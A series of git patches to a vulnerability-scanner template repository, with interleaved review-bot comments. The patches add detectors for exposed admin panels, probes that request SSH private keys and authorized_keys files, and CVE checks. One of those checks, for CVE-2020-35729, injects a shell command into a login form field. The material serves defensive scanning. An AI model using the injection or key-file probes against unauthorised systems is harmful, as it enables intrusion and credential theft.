Dhiyaneshwaran Date: Sat, 27 Feb 2021 15:59:38 +0530 Subject: [PATCH 088/370] Create radius-manager.yaml --- exposed-panels/radius-manager.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/radius-manager.yaml diff --git a/exposed-panels/radius-manager.yaml b/exposed-panels/radius-manager.yaml new file mode 100644 index 0000000000..769cf5b94b --- /dev/null +++ b/exposed-panels/radius-manager.yaml 
@@ -0,0 +1,24 @@ +id: radius-manager-login + +info: + name: Radius Manager Control Panel + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6790 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/admin.php' + - '{{BaseURL}}/radiusmanager/user.php' + - '{{BaseURL}}/user.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Radius Manager - User Control Panel' + - type: status + status: + - 200 From 9b714b54ff43ec76872cda375643c14330dde401 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 16:00:13 +0530 Subject: [PATCH 089/370] Create web-local-craft.yaml --- exposed-panels/web-local-craft.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/web-local-craft.yaml diff --git a/exposed-panels/web-local-craft.yaml b/exposed-panels/web-local-craft.yaml new file mode 100644 index 0000000000..20b9387259 --- /dev/null +++ b/exposed-panels/web-local-craft.yaml @@ -0,0 +1,21 @@ +id: weblocal-craft-login + +info: + name: Web local craft Terminal Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6800 + +requests: + - method: GET + path: + - '{{BaseURL}}/home.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'WEB Local Craft Terminal' + - type: status + status: + - 200 From 4920cec545179020582d60b69c23119aeca6d8dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 10:40:26 +0000 Subject: [PATCH 090/370] Auto Update README [Sat Feb 27 10:40:26 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 6303977ebb..9f369463e4 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 207 | vulnerabilities | 102 | exposed-panels | 74 | +| cves | 209 | vulnerabilities | 102 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | -| workflows | 22 | miscellaneous | 16 | default-logins | 14 | +| workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 618 files**. +**65 directories, 621 files**. From b1df70651b3fbc065e46c246102a1df69bd65e36 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:48:32 +0700 Subject: [PATCH 091/370] Create ssh-secret.yaml --- exposures/configs/ssh-secret.yaml | 34 +++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposures/configs/ssh-secret.yaml diff --git a/exposures/configs/ssh-secret.yaml b/exposures/configs/ssh-secret.yaml new file mode 100644 index 0000000000..69322215a2 --- /dev/null +++ b/exposures/configs/ssh-secret.yaml @@ -0,0 +1,34 @@ +id: ssh-secret + +info: + name: SSH Secret + author: pikpikcu + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/.ssh/id_rsa" + - "{{BaseURL}}/.ssh/known_hosts" + - "{{BaseURL}}/.ssh/id_rsa.pub" + - "{{BaseURL}}/.ssh/authorized_keys" + - "{{BaseURL}}/_/.ssh/authorized_keys" + - "{{BaseURL}}/.ssh/known_hosts.old" + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/plain" + part: header + + - type: word + words: + - "-----BEGIN RSA PRIVATE KEY-----" + - "ssh-rsa" + part: body + + - type: status + status: + - 200 
From c48ebd4d2622adcef3e6bb5d9fed025012f636fb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 10:56:40 +0000 Subject: [PATCH 092/370] Auto Update README [Sat Feb 27 10:56:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9f369463e4..039e2d6638 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 209 | vulnerabilities | 102 | exposed-panels | 74 | +| cves | 209 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 621 files**. +**65 directories, 627 files**. From 54dd6fd413116d59d1072dcffef656ae06b78ccc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 16:29:59 +0530 Subject: [PATCH 093/370] Update ssh-secret.yaml --- exposures/configs/ssh-secret.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/configs/ssh-secret.yaml b/exposures/configs/ssh-secret.yaml index 69322215a2..b5df031461 100644 --- a/exposures/configs/ssh-secret.yaml +++ b/exposures/configs/ssh-secret.yaml @@ -20,13 +20,13 @@ requests: - type: word words: - - "Content-Type: text/plain" + - "Content-Type: text/plain" part: header - type: word words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "ssh-rsa" + - "-----BEGIN RSA PRIVATE KEY-----" + - "ssh-rsa" part: body - type: status From 4986f792896201888e3b1b904f136d86460abd67 Mon Sep 17 00:00:00 2001 
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sat, 27 Feb 2021 11:10:05 +0000
Subject: [PATCH 094/370] Update server-private-keys.yaml
---
exposures/files/server-private-keys.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/exposures/files/server-private-keys.yaml b/exposures/files/server-private-keys.yaml
index 4237df51a3..69cea92e29 100644
--- a/exposures/files/server-private-keys.yaml
+++ b/exposures/files/server-private-keys.yaml
@@ -18,6 +18,10 @@ requests:
- "{{BaseURL}}/id_dsa"
- "{{BaseURL}}/.ssh/id_rsa"
- "{{BaseURL}}/.ssh/id_dsa"
+ - "{{BaseURL}}/.ssh/known_hosts.old"
+ - "{{BaseURL}}/.ssh/authorized_keys"
+ - "{{BaseURL}}/_/.ssh/authorized_keys"
+ - "{{BaseURL}}/.ssh/known_hosts"
- "{{BaseURL}}/{{Hostname}}.key"
- "{{BaseURL}}/{{Hostname}}.pem"
@@ -31,6 +35,7 @@ requests:
- "BEGIN DSA PRIVATE KEY"
- "BEGIN EC PRIVATE KEY"
- "BEGIN PGP PRIVATE KEY BLOCK"
+ - "ssh-rsa"
condition: or
- type: status
From e10b62ddddbd84b3c839ff49b4dfea2ca52f4e41 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sat, 27 Feb 2021 11:11:13 +0000
Subject: [PATCH 095/370] Delete ssh-secret.yaml
---
exposures/configs/ssh-secret.yaml | 34 -------------------------------
1 file changed, 34 deletions(-)
delete mode 100644 exposures/configs/ssh-secret.yaml
diff --git a/exposures/configs/ssh-secret.yaml b/exposures/configs/ssh-secret.yaml
deleted file mode 100644
index b5df031461..0000000000
--- a/exposures/configs/ssh-secret.yaml
+++ /dev/null
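Review bot: Adding `- "ssh-rsa"` to a word list that is joined with `condition: or` makes this template report public-key material as a server private key: `authorized_keys`, `known_hosts` and `known_hosts.old`, added in the first hunk, typically consist of `ssh-rsa ...` public key lines and now satisfy the matcher on their own, and so does any other response that merely quotes a public key. Exposed `authorized_keys`/`known_hosts` files are worth reporting, but they are not private keys and should not inherit this template's name and severity. Keep only the `BEGIN ... PRIVATE KEY` words here and move the four new paths together with the `ssh-rsa` word into a separate, lower-severity template — the ssh-secret.yaml deleted in patch 095 was roughly that, minus the `id_rsa` paths. The enclosing request entry and its `severity` lie outside the hunk.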
@@ -1,34 +0,0 @@ -id: ssh-secret - -info: - name: SSH Secret - author: pikpikcu - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/.ssh/id_rsa" - - "{{BaseURL}}/.ssh/known_hosts" - - "{{BaseURL}}/.ssh/id_rsa.pub" - - "{{BaseURL}}/.ssh/authorized_keys" - - "{{BaseURL}}/_/.ssh/authorized_keys" - - "{{BaseURL}}/.ssh/known_hosts.old" - - matchers-condition: and - matchers: - - - type: word - words: - - "Content-Type: text/plain" - part: header - - - type: word - words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "ssh-rsa" - part: body - - - type: status - status: - - 200 From c59c99a92edf5f19236f50177810f3b23e6fe07e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:17:45 +0530 Subject: [PATCH 096/370] Update CVE-2018-1335.yaml --- cves/2018/CVE-2018-1335.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 0eabe5183d..74fea232e7 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml @@ -4,7 +4,8 @@ info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/47208 + reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ + edb: https://www.exploit-db.com/exploits/47208 tags: cve,cve2018,apache,tika,rce requests: From 6e200c072b5f756f357d0b5698458d810eaf7ee8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 11:48:41 +0000 Subject: [PATCH 097/370] Auto Update README [Sat Feb 27 11:48:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 039e2d6638..c69dea17d3 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 209 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 210 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 627 files**. +**65 directories, 628 files**. From 3d6f9ab259e69495b46902cda4a991c9bdd54e6d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:48:35 +0530 Subject: [PATCH 098/370] Updated workflow --- workflows/dell-idrac-workflow.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/workflows/dell-idrac-workflow.yaml b/workflows/dell-idrac-workflow.yaml index aa6d7cc29a..8ae4c19f84 100644 --- a/workflows/dell-idrac-workflow.yaml +++ b/workflows/dell-idrac-workflow.yaml @@ -7,8 +7,17 @@ info: workflows: - template: technologies/dell/dell-idrac6-detect.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac7-detect.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac8-detect.yaml - - template: default-logins/dell/dell-idrac-default-login.yaml + subtemplates: + - template: default-logins/dell/dell-idrac-default-login.yaml + - template: technologies/dell/dell-idrac9-detect.yaml - - template: default-logins/dell/dell-idrac9-default-login.yaml + subtemplates: + - template: default-logins/dell/dell-idrac9-default-login.yaml 
From 214d6899f048fa81a9f58dd6591d5e6e4e144b90 Mon Sep 17 00:00:00 2001 From: PD-Team <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 27 Feb 2021 17:55:59 +0530 Subject: [PATCH 099/370] Rename phpmyadmin-wooYun.yaml to phpmyadmin-wooyun.yaml --- .../{phpmyadmin-wooYun.yaml => phpmyadmin-wooyun.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename misconfiguration/{phpmyadmin-wooYun.yaml => phpmyadmin-wooyun.yaml} (100%) diff --git a/misconfiguration/phpmyadmin-wooYun.yaml b/misconfiguration/phpmyadmin-wooyun.yaml similarity index 100% rename from misconfiguration/phpmyadmin-wooYun.yaml rename to misconfiguration/phpmyadmin-wooyun.yaml From ebe5aa8171d6a58e7b68b6e77328d191233465eb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:04:56 +0530 Subject: [PATCH 100/370] Create crush-ftp-login.yaml --- exposed-panels/crush-ftp-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/crush-ftp-login.yaml diff --git a/exposed-panels/crush-ftp-login.yaml b/exposed-panels/crush-ftp-login.yaml new file mode 100644 index 0000000000..5767a7b8e6 --- /dev/null +++ b/exposed-panels/crush-ftp-login.yaml @@ -0,0 +1,21 @@ +id: crushFTP-login + +info: + name: CrushFTP WebInterface + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6591 + +requests: + - method: GET + path: + - '{{BaseURL}}/WebInterface/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'CrushFTP WebInterface' + - type: status + status: + - 200 From fa8c3e6f5ebcc9bcb2c3a13e95fbd22d97b5a31d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:05:29 +0530 Subject: [PATCH 101/370] Create pi-admin-console.yaml --- exposed-panels/pi-admin-console.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/pi-admin-console.yaml 
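Review bot: `id: crushFTP-login` on the first line of the new crush-ftp-login.yaml does not match the kebab-case filename, and the commit immediately before this one renames `phpmyadmin-wooYun.yaml` precisely to remove mixed case. The id is what appears in output and in workflow references, so it should be `id: crush-ftp-login`. The `info:` block also lacks a `tags:` line, which the CVE templates in this series carry and which is what users filter on.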
diff --git a/exposed-panels/pi-admin-console.yaml b/exposed-panels/pi-admin-console.yaml new file mode 100644 index 0000000000..5d7922521e --- /dev/null +++ b/exposed-panels/pi-admin-console.yaml @@ -0,0 +1,22 @@ +id: pi-hole-admin-console + +info: + name: Pi-hole Admin Console + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6626 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/admin/index.php?login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Pi-hole Admin Console' + - type: status + status: + - 200 From 6286f0b263a11fedc51f8ddc8ec09fca42be15b5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:06:00 +0530 Subject: [PATCH 102/370] Create plesk-onyx.yaml --- exposed-panels/plesk-onyx.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/plesk-onyx.yaml diff --git a/exposed-panels/plesk-onyx.yaml b/exposed-panels/plesk-onyx.yaml new file mode 100644 index 0000000000..334c420bf9 --- /dev/null +++ b/exposed-panels/plesk-onyx.yaml @@ -0,0 +1,22 @@ +id: plesk-onyx-login + +info: + name: Plesk Onyx login portal + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6501 + +requests: + - method: GET + path: + - '{{BaseURL}}/login_up.php' + + matchers-condition: and + matchers: + - type: word + words: + - 'Plesk Onyx' + - 'Plesk Obsidian' + - type: status + status: + - 200 From 95da49ec1f85f3d9169bf5310621a915f3c78b2e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:06:25 +0530 Subject: [PATCH 103/370] Create siteomat-login.yaml --- exposed-panels/siteomat-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/siteomat-login.yaml diff --git a/exposed-panels/siteomat-login.yaml b/exposed-panels/siteomat-login.yaml new file mode 100644 index 0000000000..84f69afe88 --- /dev/null +++ b/exposed-panels/siteomat-login.yaml 
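Review bot: In the plesk-onyx.yaml hunk, `id: plesk-onyx-login` and `name: Plesk Onyx login portal` understate what the matcher detects: the `words:` list also contains `'Plesk Obsidian'`, so Obsidian panels are reported as an Onyx finding and the product name in the result is wrong. Either widen the metadata (`name: Plesk Onyx/Obsidian login portal`, with a matching id) or move the Obsidian word into its own template. The default word condition is `or`, so no `condition:` change is needed for the two strings.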
@@ -0,0 +1,21 @@ +id: siteomat-loader + +info: + name: Orpak SiteOmat login portals + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6624 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'SiteOmat Login' + - type: status + status: + - 200 From 15983ac452affa6bebbf1e1485567dbaf09d2609 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:07:00 +0530 Subject: [PATCH 104/370] Create vigor-login.yaml --- exposed-panels/vigor-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/vigor-login.yaml diff --git a/exposed-panels/vigor-login.yaml b/exposed-panels/vigor-login.yaml new file mode 100644 index 0000000000..b0cdb728e3 --- /dev/null +++ b/exposed-panels/vigor-login.yaml @@ -0,0 +1,21 @@ +id: vigor-login + +info: + name: Vigor Login Page + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6610 + +requests: + - method: GET + path: + - '{{BaseURL}}/weblogin.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Vigor Login Page' + - type: status + status: + - 200 From 534e817e03f0c3b082d499154cd75d6a5fe4a44b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:07:25 +0530 Subject: [PATCH 105/370] Create vmware-horizon.yaml --- exposed-panels/vmware-horizon.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/vmware-horizon.yaml diff --git a/exposed-panels/vmware-horizon.yaml b/exposed-panels/vmware-horizon.yaml new file mode 100644 index 0000000000..041294a458 --- /dev/null +++ b/exposed-panels/vmware-horizon.yaml 
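Review bot: `id: siteomat-loader` on the first line of siteomat-login.yaml looks like a typo, since both the filename and `name: Orpak SiteOmat login portals` say login. Ids are what workflows reference and what output is keyed on, so this should be `id: siteomat-login` before anything depends on the misspelt one.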
@@ -0,0 +1,21 @@ +id: vmware-horizon + +info: + name: VMware Horizon Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6496 + +requests: + - method: GET + path: + - '{{BaseURL}}/portal/webclient/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'VMware Horizon' + - type: status + status: + - 200 From 955037af10c9cd4a373e4c1fd6223447d22d7869 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 27 Feb 2021 18:07:48 +0530 Subject: [PATCH 106/370] Create xenmobile-login.yaml --- exposed-panels/xenmobile-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/xenmobile-login.yaml diff --git a/exposed-panels/xenmobile-login.yaml b/exposed-panels/xenmobile-login.yaml new file mode 100644 index 0000000000..683cbeb0f7 --- /dev/null +++ b/exposed-panels/xenmobile-login.yaml @@ -0,0 +1,21 @@ +id: xenmobile-login + +info: + name: Xenmobile Console Logon + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6675 + +requests: + - method: GET + path: + - '{{BaseURL}}/zdm/login_xdm_uc.jsp' + + matchers-condition: and + matchers: + - type: word + words: + - 'XenMobile - Console - Logon' + - type: status + status: + - 200 From ca74b3accd667ee35e7e28790f9a970dcb4fb3e2 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:08:20 +0530 Subject: [PATCH 107/370] payload update --- cves/2020/CVE-2020-35729.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index 1f5ac33847..f0af5aa3ab 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml 
@@ -24,8 +24,8 @@ requests: - method: POST path: - "{{BaseURL}}/actions/authenticate.php" - body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" + body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" matchers: - type: word words: - - "projectdiscovery.io" # from Base64 decoding payload \ No newline at end of file + - "poc-testing" # from Base64 decoding payload \ No newline at end of file From fe7b7d6d3ff37be6fb3e35f6c01418252d1737d1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 12:39:30 +0000 Subject: [PATCH 108/370] Auto Update README [Sat Feb 27 12:39:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c69dea17d3..b1345de992 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 210 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 211 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 628 files**. +**65 directories, 629 files**. From 0781aa3d66e549ab5b6fc491bf14f1bddc32dc58 Mon Sep 17 00:00:00 2001 
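Review bot: The trailing comment on the replaced `body:` line still documents the old payload (`# Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" ...`) while the body now carries `cG9jLXRlc3Rpbmc%3D`, so the comment no longer explains where the matcher word `poc-testing` comes from and should be updated to the new value. Separately, the new body reads `echo%20%cG9jLXRlc3Rpbmc%3D%22`, and `%cG` is not a valid percent-escape; compared with the removed line, the opening `%22` that followed `echo%20` appears to have been dropped, so the template should be re-verified against a test instance before merge. The enclosing request block starts above the hunk.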
From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:26:57 +0530 Subject: [PATCH 109/370] Adding CVE-2021-3129 --- cves/2021/CVE-2021-3129.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-3129.yaml diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml new file mode 100644 index 0000000000..fa125864bd --- /dev/null +++ b/cves/2021/CVE-2021-3129.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-3129 + +info: + name: Ignition Laravel RCE + author: z3bd + severity: critical + description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + tags: cve,cve2021,laravel,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/_ignition/execute-solution" + + matchers-condition: and + matchers: + - type: status + status: + - 405 + - type: word + words: + - "laravel" + negative: true \ No newline at end of file From 75d0a46221744112d31021f05cc5ac55df68de4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 27 Feb 2021 12:57:22 +0000 Subject: [PATCH 110/370] Auto Update README [Sat Feb 27 12:57:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b1345de992..7b581cead2 100644 --- a/README.md +++ b/README.md 
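Review bot: The `description:` in the new CVE-2021-3129.yaml is not a sentence ("Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE."); something like `description: Ignition before 2.5.2, as used in Laravel, allows unauthenticated remote code execution. This template only checks for the exposed endpoint.` would say what the check actually does. That matters because the matcher pair — status `405` plus the absence of the word `laravel` in the body (`negative: true`) — is a very weak signal for a `severity: critical` finding: any application that answers 405 on `/_ignition/execute-solution` without mentioning laravel will match. A positive indicator tied to the Ignition response would be needed before the severity is credible.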
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 211 | vulnerabilities | 102 | exposed-panels | 80 | +| cves | 212 | vulnerabilities | 102 | exposed-panels | 80 | | exposures | 55 | technologies | 48 | misconfiguration | 49 | | workflows | 23 | miscellaneous | 16 | default-logins | 14 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**65 directories, 629 files**. +**65 directories, 630 files**. From d6e5c4df85430d66ef4fe31a034f0a4c90dcfcd4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:27:42 +0530 Subject: [PATCH 111/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index fa125864bd..667e4cdea2 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -20,4 +20,4 @@ requests: - type: word words: - "laravel" - negative: true \ No newline at end of file + negative: true \ No newline at end of file From dcd939ad9784c7b26507ebc3fa9578d8676a6647 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:30:16 +0530 Subject: [PATCH 112/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 667e4cdea2..7b37f15e1b 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml 
@@ -4,7 +4,8 @@ info: name: Ignition Laravel RCE author: z3bd severity: critical - description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE. + reference: https://www.ambionics.io/blog/laravel-debug-rce tags: cve,cve2021,laravel,rce requests: From 705b0d05f342d61d3159c62cf137d7c76b7819d6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 18:31:48 +0530 Subject: [PATCH 113/370] Update CVE-2021-3129.yaml --- cves/2021/CVE-2021-3129.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3129.yaml b/cves/2021/CVE-2021-3129.yaml index 7b37f15e1b..af09421449 100644 --- a/cves/2021/CVE-2021-3129.yaml +++ b/cves/2021/CVE-2021-3129.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET - path: + path: - "{{BaseURL}}/_ignition/execute-solution" matchers-condition: and From 7b4257a4e593f0eec014a7a3fcbf4d1064380d92 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 27 Feb 2021 19:56:18 +0530 Subject: [PATCH 114/370] removing duplicate template --- exposed-panels/pi-admin-console.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 exposed-panels/pi-admin-console.yaml diff --git a/exposed-panels/pi-admin-console.yaml b/exposed-panels/pi-admin-console.yaml deleted file mode 100644 index 5d7922521e..0000000000 --- a/exposed-panels/pi-admin-console.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: pi-hole-admin-console - -info: - name: Pi-hole Admin Console - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6626 - -requests: - - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/admin/index.php?login' - - matchers-condition: and - matchers: - - type: word - words: - - 'Pi-hole Admin Console' - - type: status - status: - - 200 
